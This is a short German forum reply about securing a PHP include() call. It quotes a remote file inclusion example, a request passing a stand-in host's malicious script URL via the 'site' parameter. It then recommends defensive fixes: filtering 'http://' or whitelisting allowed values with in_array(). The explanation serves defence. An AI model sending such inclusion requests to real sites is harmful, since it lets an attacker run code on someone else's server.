Hallo Philipp,

sonst kommt einer daher und ruft dein Script über index.php?site=http://example.com/beoessesscript.txt auf und schon hast du den Salat.
Was könnte ich dagegen tun?

indem du prüfst, ob in $_GET['site'] irgendwas mit "http://" drinsteht, oder du machst dir ein Array mit erlaubten Werten für $_GET['site'] und schaust dann nach, ob der übergebene Wert im Array steht (mit in_array()) - wenn ja, führst du dein include() aus, wenn nicht bindest du die Standardseite (home.php) ein.

Grüße aus Nürnberg
Tobias